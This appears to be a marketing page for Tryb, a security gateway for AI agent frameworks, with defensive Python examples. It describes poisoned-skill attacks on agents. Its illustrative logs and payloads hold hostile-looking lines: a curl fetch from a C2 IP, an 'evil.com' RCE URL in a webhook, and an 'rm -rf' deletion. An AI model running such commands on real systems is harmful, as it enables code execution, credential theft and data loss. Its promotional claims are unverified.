ClawHavoc + CVEs across OpenClaw, CrewAI, Langflow -- Feb 2026

The managed security gateway for AI agents

OpenClaw, CrewAI, LangChain, AutoGen -- every agent framework installs unvetted skills and stores API keys in plaintext. Tryb intercepts, scans, and secures every connection before it reaches your machine. CrowdStrike for the agent layer.

tryb gateway -- agent-max
[SCAN] Intercepted: web-scraper-pro@2.1.4
[L1:IOC] AMOS Base64 Stager ........... FAIL
[L1:IOC] Known C2 IP (91.92.242.x) .... FAIL
[L2:Deob] Hidden payload decoded ........ FAIL
[L3:Graph] Ownership change 3d ago ...... FAIL
[L4:Clawdex] Hash match: ClawHavoc ...... FAIL
[L5:AI] Intent: malicious (97%) ...... FAIL
[L6:Score] Composite: 0.943 ............. BLOCKED

[CVE] gatewayUrl stripped from webhook payload
[TG] Telegram alert sent. Fire switch armed.
[GW] Gateway secure.
February 2026

Every agent framework is under attack

ClawHavoc injected 341 OpenClaw skills with the AMOS stealer. CVE-2026-25253 enables 1-Click RCE via a poisoned gatewayUrl parameter -- Tryb strips it from every request automatically. Langflow shipped a CVSS 9.4 RCE for full account takeover. The attack surface is the same everywhere: unvetted skills, plaintext credentials, no fire switch. This isn't one framework's problem -- it's the entire agent layer.

341 OpenClaw skills compromised (ClawHavoc campaign)

9.8 CVSS score: gatewayUrl 1-Click RCE (CVE-2026-25253)

9.4 CVSS score: Langflow RCE (CVE-2025-3248)

0 Agents behind Tryb that were compromised

The attack vector every framework shares

1. Skill / tool install

Agent installs a skill from ClawHub, a CrewAI tool, or a LangChain integration. The code looks clean -- the malware is in post_install hooks or obfuscated setup scripts.

2. Credential theft

The script reads .env, ~/.ssh, and browser cookies. Keys stored in plaintext are trivially exfiltrated.

3. Silent exfil

Data is sent to a C2 server over HTTPS. The agent continues running normally. You don't know you're compromised until your Stripe account is drained.

The unfair advantage

Not a tunnel. A managed security gateway.

ngrok gives you a URL. Tryb gives you a security perimeter. Every connection is scanned, every exploit is patched, and you have a fire switch in your pocket.

The scrubbing proxy

6-Layer Scan Engine

We don't just tunnel traffic -- we intercept clawhub install commands and run every skill through a 6-layer scan engine: 26 YARA-equivalent IOC patterns, LLM deobfuscation that decodes hidden payloads, supply chain graph analysis for ownership changes, Koi Clawdex for hash matching, semantic AI intent classification, and a weighted risk score with fail-closed enforcement. If Clawdex goes down, we block -- not warn.

6 layers. Fail-closed.
[SCAN] Intercepted: data-pipeline-v3@1.2.0

L1:IOC   AMOS Base64 Stager ....... FAIL
L1:IOC   Known C2 IP .............. FAIL
L2:Deob  Decoded base64 payload ... FAIL
  -> Hidden: curl -s http://91.92.242.30/drop
L3:Graph Ownership changed 3d ago . FAIL
  -> Previous: legit_dev_42 -> xdev_tools_99
L4:Clawdex Hash match: ClawHavoc .. FAIL
L5:AI    Intent: malicious (97%) .. FAIL
L6:Score Composite: 0.94 .......... BLOCKED

[TELEGRAM] Alert sent. Fire switch armed.
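
What "fail-closed" means for a weighted score, as an added example (not Tryb's code): a layer that returns no verdict forces a block instead of being dropped from the average. The layer names, weights and threshold are hypothetical; the page does not publish its own.

```python
# Hypothetical layer weights and block threshold (assumptions, not from the page).
WEIGHTS = {"ioc": 0.25, "deob": 0.15, "graph": 0.15, "clawdex": 0.25, "intent": 0.20}
BLOCK_AT = 0.5


def composite(results, fail_closed=True):
    """Combine per-layer verdicts into (decision, score, reason).

    results maps layer name -> True (flagged), False (clean) or
    None (the layer timed out or its backing service was down).
    """
    missing = sorted(n for n in WEIGHTS if results.get(n) is None)
    if missing and fail_closed:
        # Fail closed: an absent verdict is treated as a reason to block,
        # never as a clean result.
        return "BLOCKED", None, "no verdict from: " + ", ".join(missing)

    # Fail-open path, kept only for contrast: silent layers are skipped and
    # the remaining weights are renormalised.
    answered = {n: w for n, w in WEIGHTS.items() if results.get(n) is not None}
    total = sum(answered.values())
    if total == 0:
        return "BLOCKED", None, "no layer answered"
    score = round(sum(w for n, w in answered.items() if results[n]) / total, 3)
    decision = "BLOCKED" if score >= BLOCK_AT else "ALLOWED"
    return decision, score, "score compared with threshold"


# Constructed sample: the hash-lookup layer is unreachable and only the
# ownership-graph layer flagged the package.
CLAWDEX_DOWN = {"ioc": False, "deob": False, "graph": True,
                "clawdex": None, "intent": False}

if __name__ == "__main__":
    print("fail-closed:", composite(CLAWDEX_DOWN))
    print("fail-open:  ", composite(CLAWDEX_DOWN, fail_closed=False))
```

With the same input, the fail-open path scores the package from the four layers that answered and lets it through, which is the behaviour the paragraph above rules out.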

Sever the tunnel from your phone

Text-to-Fire Switch

A dedicated Telegram bot monitors your agent in real time. If it starts deleting files, making unexpected purchases, or behaving erratically, you get an instant alert and can tap a single button to sever the tunnel. The agent loses all internet access immediately. No SSH required.

One tap. Instant disconnect.
TRYB BOT:
  Agent "agent-max" is deleting files:
    rm -rf /Users/dan/projects/*

  This matches pattern: mass_file_deletion
  Confidence: 98.7%

  [  KILL TUNNEL  ]  [  ALLOW  ]

  > You tapped KILL TUNNEL
  > Tunnel severed at 14:32:07 UTC
  > Agent internet access: REVOKED
  > All queued webhooks: HELD

Automatic exploit neutralization

CVE-2026-25253 Patching

CVE-2026-25253 enables 1-Click RCE via a poisoned gatewayUrl parameter in agentic frameworks. Our proxy automatically strips the gatewayUrl key from every incoming webhook and WebSocket message before it reaches your agent. This neutralizes the exploit at the cloud level, even if you haven't updated your OpenClaw, CrewAI, or LangChain version. Every stripped key is logged as a critical firewall event.

Auto-patched at the proxy layer
POST /hook/agent-max -> Tryb Proxy

  Incoming payload:
  { "action": "run",
    "gatewayUrl": "http://evil.com/rce",  <-- RCE
    "task": "summarize" }

  Tryb strips "gatewayUrl" before forwarding:
  { "action": "run",
    "task": "summarize" }

  [FIREWALL] CVE-2026-25253: stripped 1 key
  [SEVERITY] Critical
  [STATUS] Neutralized -- agent never saw it
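
The key stripping shown above, as an added example (not Tryb's code). It goes beyond the flat payload on the page by removing the key at any nesting depth and in any letter case, and it rejects bodies that do not parse; those three behaviours, the function names and the logger name are assumptions.

```python
import json
import logging

log = logging.getLogger("proxy.firewall")  # hypothetical logger name
BLOCKED_KEYS = {"gatewayurl"}              # compared case-insensitively (assumption)


def strip_keys(node, path="$", removed=None):
    """Return (clean_copy, removed_paths) with blocked keys dropped at any depth."""
    if removed is None:
        removed = []
    if isinstance(node, dict):
        clean = {}
        for key, value in node.items():
            child = f"{path}.{key}"
            if key.lower() in BLOCKED_KEYS:
                removed.append(child)
                continue
            clean[key] = strip_keys(value, child, removed)[0]
        return clean, removed
    if isinstance(node, list):
        items = [strip_keys(v, f"{path}[{i}]", removed)[0] for i, v in enumerate(node)]
        return items, removed
    return node, removed


def sanitize_webhook(raw: bytes):
    """Parse, strip and re-serialise a webhook body.

    Returns (clean_body, removed_paths); clean_body is None when the body is
    not valid JSON, so the caller can reject it instead of forwarding it.
    """
    try:
        payload = json.loads(raw)
    except ValueError:  # covers JSONDecodeError and UnicodeDecodeError
        return None, []
    clean, removed = strip_keys(payload)
    for p in removed:
        log.critical("stripped blocked key at %s", p)
    # Forward the re-serialised object, never the original bytes: duplicate
    # keys and escaped spellings such as "gateway\u0055rl" are normalised by
    # the parser before the check runs, so they cannot slip past it.
    return json.dumps(clean).encode(), removed


if __name__ == "__main__":
    # Payload taken from the example on the page.
    body = b'{"action": "run", "gatewayUrl": "http://evil.com/rce", "task": "summarize"}'
    print(sanitize_webhook(body))
```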

Also included

Everything else you need

Payload Firewall

Every webhook is inspected for shell injections, path traversals, and RCE patterns before delivery.

24h Webhook Queue

Webhooks are buffered when your agent sleeps and auto-drained on reconnect.

Human Relay

Agent pauses and asks you via Telegram before high-stakes actions. One tap to approve or deny.

Static IP

Dedicated IP addresses for services that require IP allowlisting.

Security shouldn't be an afterthought

Free tier protects you today. Upgrade when your agents go to production.

Starter

$0 forever

Explore the security gateway

2 agents
Skill scanning (community DB)
500 tunnel hours/mo
50K webhooks/mo
Built-in firewall rules
24h webhook queue

Guardian (Most Popular)

$19/mo

Full protection for production agents

10 agents
Skill scanning (Koi Clawdex)
Telegram fire switch
CVE-2026-25253 patching
Custom firewall rules
Unlimited tunnel hours
Human relay

Sentinel

$49/mo

For teams running agent fleets

Unlimited agents
Skill scanning (private + Clawdex)
Fire switch (Telegram + Slack)
CVE-2026-25253 patching
Priority threat intelligence
Team management
SLA + priority support

All plans include the dashboard, webhook inspector, firewall, and API access. No credit card required for Starter.

Your agents are running blind

341 skills were compromised last month. Don't wait for yours to be next. Tryb scans every skill, patches every CVE, and gives you a fire switch.